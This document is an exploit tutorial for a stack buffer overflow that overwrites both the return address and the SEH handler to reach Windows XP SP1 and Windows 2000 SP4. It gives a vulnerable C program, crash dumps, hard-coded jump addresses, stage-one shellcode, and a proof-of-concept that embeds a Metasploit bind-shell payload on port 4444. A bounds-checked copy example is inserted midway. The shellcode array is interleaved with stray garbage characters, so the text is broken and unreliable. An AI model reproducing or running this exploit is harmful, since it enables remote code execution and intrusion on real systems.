The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address; in this case we keep overwriting the stack and overwrite the default exception handler as well.

    [Buf]                 <- Shellcode
    [Return Address]      <- jmp register (for Windows XP SP1)
    [Various Stack Data]  <- Junk
    [Pointer To Next SEH] <- "\xEB\x06\xff\xff" (jump 6 bytes forward)
    [SE Handler]          <- jmp register (for Win2k SP4)
    [Stage1 Shellcode]    <- stage1 shellcode for Win2k

If the first return address (Windows XP SP1) is wrong, an exception will occur and the default exception handler will be called (Windows 2000 SP4). This allows us to create a stable exploit with two return addresses.
Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac
Vulnerable test application:

    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char buf[512];
        char buf1[1024]; // <- simulate a stack
        //DebugBreak();
        if (argc != 2) { return -1; }
        strcpy(buf, argv[1]); // no length check: an argument longer than buf overruns the stack
        return 0x0;
    }
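Added example, not from the original post: the same argv-to-buffer copy with the bound enforced, so an over-long argument is rejected before it can reach the saved return address or the exception registration record. The names bounded_copy and run_harness are my own.

```c
#include <stdio.h>
#include <string.h>

/* Same stack buffer size as the test application above. */
#define BUF_SIZE 512

/* Copy src into dst only if it fits, NUL terminator included.
   Returns 0 on success, -1 if the input would overrun dst.
   That overrun is exactly what lets argv[1] reach the return
   address and, further up the stack, the SEH record. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size) {
        return -1;              /* refuse; do not truncate silently */
    }
    memcpy(dst, src, len + 1);  /* copies the terminating NUL too */
    return 0;
}

/* Mirror of the original harness: one argument copied into a
   512-byte stack buffer. Returns -1 on bad argc or over-long input. */
int run_harness(int argc, char **argv)
{
    char buf[BUF_SIZE];
    char buf1[1024];            /* kept to match the original layout */
    (void)buf1;
    if (argc != 2) {
        return -1;
    }
    if (bounded_copy(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n",
                sizeof buf - 1);
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    return run_harness(argc, argv);
}
```

Run with a 1600-byte argument, as in the crash walkthrough below, and the copy is refused instead of overwriting EIP and the SEH record.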
Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed with the following register state:

    EAX 00000000
    ECX 00321404
    EDX 00414141
    EBX 7FFDF000
    ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    EBP 41414141
    ESI 77D4595F
    EDI 77F59037 ntdll.77F59037
    EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:

    0x0012FFB0 41414141 Pointer to next SEH Record
    0x0012FFB4 41414141 SE Handler

We successfully overwrote the return address and the default exception handler.
Primary Return Address (Windows XP SP1 EN):
The first return address will be called as in a normal stack overflow. We can see that ESP points to user input, so we will use that as our first-stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 EN), and our first-stage shellcode will be:

    "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k SP4 EN), and our first-stage shellcode will be:

    "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
Proof Of Concept:

    // exploit.c
    // Tal zeltzer - [Double Return] //

    #include <stdio.h>
    #include <string.h>
    #include <windows.h>

    #define RET_XP    0x77F8AC16 // WinXP Sp1 English - jmp esp
    #define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

    // Stage1 For WinXP Sp1 English
    unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

    // Stage1 For Win2k Sp4 English
    unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

    // win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
    unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"/ c! d: z5 _9 X7 e0 o
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"( N( u4 F- E& q) ~
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"( W% g3 |; ]+ ^ I% _$ {
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"6 q! K7 U1 o( [, M
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74" # k$ y% K4 a, O8 e: N"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"! m" `. Y$ j& J% I$ q' \' J4 d( V
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14". U' ?" B; V0 @0 I& s
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"' W( ^4 B; l/ _3 z& y4 g
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"- f8 g2 J. z# @, [. z# w
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf" & X: C; x8 m+ b* \- s" u$ F"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"% q: l O4 L3 s- J1 w
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18" 3 G+ s* e+ e% F0 e1 {"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"4 G) L' a' E2 E
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"6 M( z% s- \% q$ m4 a2 R
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"% D' b9 U: ]9 N" e1 B3 t6 G; C
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"- g* v, F0 @- X8 g( @# p% A3 g
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18" & }3 p3 T$ @3 a"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f" , q; t" o! V& x1 V7 z+ b4 ~"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"8 i; W3 w$ X8 x0 c, z! I6 S
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"; m( o# @2 h/ D
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"( r1 w" p; z3 M1 U$ G4 O
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"7 n2 m% M! ?6 Z5 w4 V/ L
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"8 ^# D! ^" `) K' a) Z% r
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a" , x& p5 W5 y1 v K"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98"; 1 ^0 X% W# A _4 Z/ m1 \1 I6 ]: X/ w+ Q% L7 T# T: k